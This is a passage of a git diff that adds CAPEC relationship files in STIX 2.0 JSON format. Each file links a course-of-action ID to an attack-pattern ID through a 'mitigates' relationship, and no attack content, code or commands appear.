"course-of-action--0d9c19f1-20dd-4569-afb6-edbc667c16b1", + "target_ref": "attack-pattern--da89b021-dcf2-4901-9584-c264140320ae", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c66a4576-2d04-4099-8a5c-91a340688c10.json b/capec/relationship/relationship--c66a4576-2d04-4099-8a5c-91a340688c10.json new file mode 100644 index 0000000000..961119e0da --- /dev/null +++ b/capec/relationship/relationship--c66a4576-2d04-4099-8a5c-91a340688c10.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--113f789f-854d-46fc-bf5a-200881b17af7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c66a4576-2d04-4099-8a5c-91a340688c10", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6a4ada4e-5df9-4d9e-814b-230bdb0637c8", + "target_ref": "attack-pattern--dc7233cb-94c8-40cb-800b-e89e4cfee66e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c6e696a4-de63-4daf-ace7-92adb1fcb939.json b/capec/relationship/relationship--c6e696a4-de63-4daf-ace7-92adb1fcb939.json new file mode 100644 index 0000000000..e07eb6f076 --- /dev/null +++ b/capec/relationship/relationship--c6e696a4-de63-4daf-ace7-92adb1fcb939.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8fa229d3-8141-4be2-ac23-d8b87192fb9d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c6e696a4-de63-4daf-ace7-92adb1fcb939", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a78dc251-20b0-40ba-8c69-a48e4dc81eb5", + "target_ref": "attack-pattern--c1a553a6-7db5-4b2f-95ef-434f08a2c84e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c6ec2d76-e409-4f47-b91d-f0c14c2f7e28.json b/capec/relationship/relationship--c6ec2d76-e409-4f47-b91d-f0c14c2f7e28.json new file mode 100644 index 0000000000..49628b9e45 --- /dev/null +++ b/capec/relationship/relationship--c6ec2d76-e409-4f47-b91d-f0c14c2f7e28.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a4da703a-8728-4493-b159-fe5076f44da5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c6ec2d76-e409-4f47-b91d-f0c14c2f7e28", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--496c5a9c-3c8c-4887-a46a-6b3230ed0c06", + "target_ref": "attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c6eff99c-44a6-4a6b-a24c-ee37b75d0d50.json b/capec/relationship/relationship--c6eff99c-44a6-4a6b-a24c-ee37b75d0d50.json new file mode 100644 index 0000000000..4c632e1010 --- /dev/null +++ b/capec/relationship/relationship--c6eff99c-44a6-4a6b-a24c-ee37b75d0d50.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--64d55e69-bd27-4089-810d-79c372631da3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c6eff99c-44a6-4a6b-a24c-ee37b75d0d50", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ceac777c-5bea-49d6-b3b9-a8655e5a41b0", + "target_ref": "attack-pattern--dc7233cb-94c8-40cb-800b-e89e4cfee66e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c729dc55-a1b8-443c-bbc9-d4404dadda06.json b/capec/relationship/relationship--c729dc55-a1b8-443c-bbc9-d4404dadda06.json new file mode 100644 index 0000000000..a6f94a35fe --- /dev/null +++ b/capec/relationship/relationship--c729dc55-a1b8-443c-bbc9-d4404dadda06.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--53dd4540-90af-4e68-ab97-d54ded81470f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c729dc55-a1b8-443c-bbc9-d4404dadda06", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--043a9f6d-144b-439f-84bf-43973bf67ad0", + "target_ref": "attack-pattern--1408a566-eced-4d5d-aa0d-a7b373e80ea6", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c72d1e60-6f64-45ad-9ac1-bf091aeb1325.json b/capec/relationship/relationship--c72d1e60-6f64-45ad-9ac1-bf091aeb1325.json new file mode 100644 index 0000000000..bff12e2119 --- /dev/null +++ b/capec/relationship/relationship--c72d1e60-6f64-45ad-9ac1-bf091aeb1325.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--71cead1e-85be-4b1a-b399-590c9ac56399", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c72d1e60-6f64-45ad-9ac1-bf091aeb1325", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fe2064cc-6c8a-4d9b-87e8-5f0491194111", + "target_ref": "attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c7501a8c-7f42-4536-8b86-125603eaba9d.json b/capec/relationship/relationship--c7501a8c-7f42-4536-8b86-125603eaba9d.json new file mode 100644 index 0000000000..041666d350 --- /dev/null +++ b/capec/relationship/relationship--c7501a8c-7f42-4536-8b86-125603eaba9d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--44af182e-a539-4195-9eff-89565edd55bc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c7501a8c-7f42-4536-8b86-125603eaba9d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8765b029-9621-452e-9a68-6ea740a42ece", + "target_ref": "attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c7b26389-c529-4d2b-ad7b-e74fc65699db.json b/capec/relationship/relationship--c7b26389-c529-4d2b-ad7b-e74fc65699db.json new file mode 100644 index 0000000000..4e63647a2a --- /dev/null +++ b/capec/relationship/relationship--c7b26389-c529-4d2b-ad7b-e74fc65699db.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--148b6c77-3922-4886-9416-ff00643673e5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c7b26389-c529-4d2b-ad7b-e74fc65699db", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--91237e5f-d950-4f1d-8d7b-69014cc9cb04", + "target_ref": "attack-pattern--2639a852-3832-492a-b16c-0d568ecb8fa7", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c7bb5a65-1cfa-4368-99de-417b00375584.json b/capec/relationship/relationship--c7bb5a65-1cfa-4368-99de-417b00375584.json new file mode 100644 index 0000000000..75b6533ac6 --- /dev/null +++ b/capec/relationship/relationship--c7bb5a65-1cfa-4368-99de-417b00375584.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--36170166-1b67-459b-8da7-f64f902160aa", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c7bb5a65-1cfa-4368-99de-417b00375584", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f9c65d00-bf25-4939-96ed-2eec4c4f7b8f", + "target_ref": "attack-pattern--633f7dbb-7575-4fb9-b950-76152580d5d3", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c872df25-83b3-49d5-bfa5-f1d177eee584.json b/capec/relationship/relationship--c872df25-83b3-49d5-bfa5-f1d177eee584.json new file mode 100644 index 0000000000..b7ef70fcb2 --- /dev/null +++ b/capec/relationship/relationship--c872df25-83b3-49d5-bfa5-f1d177eee584.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--62e6e1eb-d78c-43e5-867f-053b82a87820", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c872df25-83b3-49d5-bfa5-f1d177eee584", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-04T00:00:00.000Z", + "modified": "2018-05-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac9ac07b-b96d-42fa-9c32-eb7b6531cb0f", + "target_ref": "attack-pattern--1f3bd742-4a95-4a3d-acd6-f82b15720d9f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c87904c0-cfe0-43b2-8962-79660b813dbd.json b/capec/relationship/relationship--c87904c0-cfe0-43b2-8962-79660b813dbd.json new file mode 100644 index 0000000000..fed5fc325b --- /dev/null +++ b/capec/relationship/relationship--c87904c0-cfe0-43b2-8962-79660b813dbd.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ec42910d-7186-412b-b533-5b7789974102", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c87904c0-cfe0-43b2-8962-79660b813dbd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--55337545-1e96-4f8c-b0e5-181084b3a3e8", + "target_ref": "attack-pattern--81cb8af7-a9ff-4c4d-822c-c74a618da6ad", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--c997e17d-b481-44ab-8641-d268fc9964bb.json b/capec/relationship/relationship--c997e17d-b481-44ab-8641-d268fc9964bb.json new file mode 100644 index 0000000000..a6b9fee740 --- /dev/null +++ b/capec/relationship/relationship--c997e17d-b481-44ab-8641-d268fc9964bb.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--853c51e6-a1a9-4665-bb52-face14b6a8de", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c997e17d-b481-44ab-8641-d268fc9964bb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--dea16962-39f8-45fc-a56d-358a8713bdf9", + "target_ref": "attack-pattern--a0553da3-9941-4500-b267-cb7e16a5bc63", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ca2c3223-2a6d-4d2b-9ea0-2990f3112c58.json b/capec/relationship/relationship--ca2c3223-2a6d-4d2b-9ea0-2990f3112c58.json new file mode 100644 index 0000000000..f88be434b1 --- /dev/null +++ b/capec/relationship/relationship--ca2c3223-2a6d-4d2b-9ea0-2990f3112c58.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d93d53b5-f8bb-442a-b82d-91a83afd71d6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ca2c3223-2a6d-4d2b-9ea0-2990f3112c58", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b5654dc2-0060-4ab0-9920-0aa60ae7d36a", + "target_ref": "attack-pattern--7b38c275-4653-4cef-9a72-cb2d53a1e11e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ca6ddc66-5dac-4b75-8d8d-e0e6afed9e7c.json b/capec/relationship/relationship--ca6ddc66-5dac-4b75-8d8d-e0e6afed9e7c.json new file mode 100644 index 0000000000..89d2a357d4 --- /dev/null +++ b/capec/relationship/relationship--ca6ddc66-5dac-4b75-8d8d-e0e6afed9e7c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1fe1fb74-872e-421a-ac58-3aa9e00967f1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ca6ddc66-5dac-4b75-8d8d-e0e6afed9e7c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1179db20-1dbd-48ea-bd08-9e800a816d56", + "target_ref": "attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--caa76434-7cae-42ce-9634-01b8f7882546.json b/capec/relationship/relationship--caa76434-7cae-42ce-9634-01b8f7882546.json new file mode 100644 index 0000000000..3f1d710f33 --- /dev/null +++ b/capec/relationship/relationship--caa76434-7cae-42ce-9634-01b8f7882546.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--083b96ad-5a82-4d04-9be1-f4bc3d8edff2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--caa76434-7cae-42ce-9634-01b8f7882546", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--afd793c6-61b0-44aa-8eae-87cd14cafc6b", + "target_ref": "attack-pattern--47c67c9b-d65c-4eb8-ac6e-9c0de8c64ba3", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cb112114-48b9-48c9-ac6d-3a22374a55cc.json b/capec/relationship/relationship--cb112114-48b9-48c9-ac6d-3a22374a55cc.json new file mode 100644 index 0000000000..c2d7b9a278 --- /dev/null +++ b/capec/relationship/relationship--cb112114-48b9-48c9-ac6d-3a22374a55cc.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2c9c24c1-7b0b-4e71-b005-f584e2aaccc2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cb112114-48b9-48c9-ac6d-3a22374a55cc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7e6b281-8e4e-4a25-9724-167e00f6ffca", + "target_ref": "attack-pattern--ce67b345-712f-4516-bb1a-555688650caa", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cb17feb8-6d17-4b8c-b451-c4c2747dfa9e.json b/capec/relationship/relationship--cb17feb8-6d17-4b8c-b451-c4c2747dfa9e.json new file mode 100644 index 0000000000..2de9b8c988 --- /dev/null +++ b/capec/relationship/relationship--cb17feb8-6d17-4b8c-b451-c4c2747dfa9e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5fcc0b48-9338-476d-9a15-7fb0ec8b3041", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cb17feb8-6d17-4b8c-b451-c4c2747dfa9e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0c3b87ec-c44e-467b-8066-ee96dfcdfc80", + "target_ref": "attack-pattern--3faacb4b-f20b-4101-b8f2-51c49cee5be4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cb2731ed-1fd9-400f-892f-9a3168c06b92.json b/capec/relationship/relationship--cb2731ed-1fd9-400f-892f-9a3168c06b92.json new file mode 100644 index 0000000000..48ab6fbc1f --- /dev/null +++ b/capec/relationship/relationship--cb2731ed-1fd9-400f-892f-9a3168c06b92.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f15d356f-c199-4d0a-b939-62b5ea721451", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cb2731ed-1fd9-400f-892f-9a3168c06b92", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--367827bd-6e63-4041-96a8-7e5cfcdac56c", + "target_ref": "attack-pattern--7a4fd69c-ba2e-4a7a-b5df-455180c33ce8", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cb8e0fa8-9821-4987-a59e-d3b9c6e3481b.json b/capec/relationship/relationship--cb8e0fa8-9821-4987-a59e-d3b9c6e3481b.json new file mode 100644 index 0000000000..0131e3442b --- /dev/null +++ b/capec/relationship/relationship--cb8e0fa8-9821-4987-a59e-d3b9c6e3481b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0a896f79-c8aa-4b72-bca5-1aa9f0a25361", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cb8e0fa8-9821-4987-a59e-d3b9c6e3481b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e25cd1a6-2a1c-4c1f-b6fb-b09d0effdf63", + "target_ref": "attack-pattern--285f4e6f-6fa1-4005-989a-2b1e86e8f1e9", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cbda8fea-6328-4a87-acd6-4f41441bade8.json b/capec/relationship/relationship--cbda8fea-6328-4a87-acd6-4f41441bade8.json new file mode 100644 index 0000000000..a9cc721818 --- /dev/null +++ b/capec/relationship/relationship--cbda8fea-6328-4a87-acd6-4f41441bade8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b2c07dea-a225-4faf-85e3-2134d70d96ed", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cbda8fea-6328-4a87-acd6-4f41441bade8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a0e116b6-ef9d-4fc2-9668-ee7c94b249fe", + "target_ref": "attack-pattern--4185a203-2337-4000-aeaa-e701fd4779f5", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cc1c02e5-b81a-4280-874b-987523b1eb0d.json b/capec/relationship/relationship--cc1c02e5-b81a-4280-874b-987523b1eb0d.json new file mode 100644 index 0000000000..7bc6de0532 --- /dev/null +++ b/capec/relationship/relationship--cc1c02e5-b81a-4280-874b-987523b1eb0d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--eee11cb2-6775-4fe9-8bca-c3c2f0464bd1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cc1c02e5-b81a-4280-874b-987523b1eb0d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--667a9827-66c0-4efa-ba4b-02699ee52948", + "target_ref": "attack-pattern--47c67c9b-d65c-4eb8-ac6e-9c0de8c64ba3", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cc6e015d-75ba-4437-992c-d391fd8fe429.json b/capec/relationship/relationship--cc6e015d-75ba-4437-992c-d391fd8fe429.json new file mode 100644 index 0000000000..d5af100872 --- /dev/null +++ b/capec/relationship/relationship--cc6e015d-75ba-4437-992c-d391fd8fe429.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9095f62f-2c59-4c6a-a942-519207f9bcdf", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cc6e015d-75ba-4437-992c-d391fd8fe429", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526", + "target_ref": "attack-pattern--67562799-2d10-4e76-b3da-649c6d844340", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cc96eadf-14e2-405b-b2b7-6f4b9f6fab4a.json b/capec/relationship/relationship--cc96eadf-14e2-405b-b2b7-6f4b9f6fab4a.json new file mode 100644 index 0000000000..7f340d4016 --- /dev/null +++ b/capec/relationship/relationship--cc96eadf-14e2-405b-b2b7-6f4b9f6fab4a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8902c46b-42e3-4e85-84a5-6193cc8c1d6b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cc96eadf-14e2-405b-b2b7-6f4b9f6fab4a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9e2c42d5-5712-496e-a27a-6a1b3bea2ffa", + "target_ref": "attack-pattern--e55cf19d-be47-487a-acff-69b9f48382c1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cca4c79f-b73e-4b99-a721-6dceff911aa1.json b/capec/relationship/relationship--cca4c79f-b73e-4b99-a721-6dceff911aa1.json new file mode 100644 index 0000000000..bd85b152dc --- /dev/null +++ b/capec/relationship/relationship--cca4c79f-b73e-4b99-a721-6dceff911aa1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d7ae7b69-767e-4471-b08a-af81ddad507c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cca4c79f-b73e-4b99-a721-6dceff911aa1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c5259bad-3aa0-4826-acb3-eef0dae15daa", + "target_ref": "attack-pattern--c1a553a6-7db5-4b2f-95ef-434f08a2c84e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cccb0e32-4f31-47b9-97ac-316107163645.json b/capec/relationship/relationship--cccb0e32-4f31-47b9-97ac-316107163645.json new file mode 100644 index 0000000000..e2ce278ab4 --- /dev/null +++ b/capec/relationship/relationship--cccb0e32-4f31-47b9-97ac-316107163645.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b3d64992-41ea-4d28-9698-7d05f5577794", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cccb0e32-4f31-47b9-97ac-316107163645", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e321100c-7fd0-4dde-8013-7e3871aea671", + "target_ref": "attack-pattern--c29999db-082a-4dff-b420-73f324a13bc1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ccf3323d-a371-4ec9-8947-290aa02ec914.json b/capec/relationship/relationship--ccf3323d-a371-4ec9-8947-290aa02ec914.json new file mode 100644 index 0000000000..21e547945e --- /dev/null +++ b/capec/relationship/relationship--ccf3323d-a371-4ec9-8947-290aa02ec914.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1a6a6894-cfe7-45bb-a63f-c088971448ea", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ccf3323d-a371-4ec9-8947-290aa02ec914", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2248876f-47b7-4818-9150-38be47817f40", + "target_ref": "attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cd2b2d1e-29d4-4ec5-9876-b210fdfded05.json b/capec/relationship/relationship--cd2b2d1e-29d4-4ec5-9876-b210fdfded05.json new file mode 100644 index 0000000000..a43f0b915f --- /dev/null +++ b/capec/relationship/relationship--cd2b2d1e-29d4-4ec5-9876-b210fdfded05.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d70e4f9f-32a2-4e3c-a1ad-ccb25e72e2f3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cd2b2d1e-29d4-4ec5-9876-b210fdfded05", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--705bc137-3094-4299-b3e3-0a101390f074", + "target_ref": "attack-pattern--48b3fdcc-8514-4c53-bcda-5302b3b71e59", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--cd90abb4-18df-4f14-b008-5157c2b99f68.json b/capec/relationship/relationship--cd90abb4-18df-4f14-b008-5157c2b99f68.json new file mode 100644 index 0000000000..519799584c --- /dev/null +++ b/capec/relationship/relationship--cd90abb4-18df-4f14-b008-5157c2b99f68.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8f8689fd-284a-45c4-a1cc-06d299899e12", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--cd90abb4-18df-4f14-b008-5157c2b99f68", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + 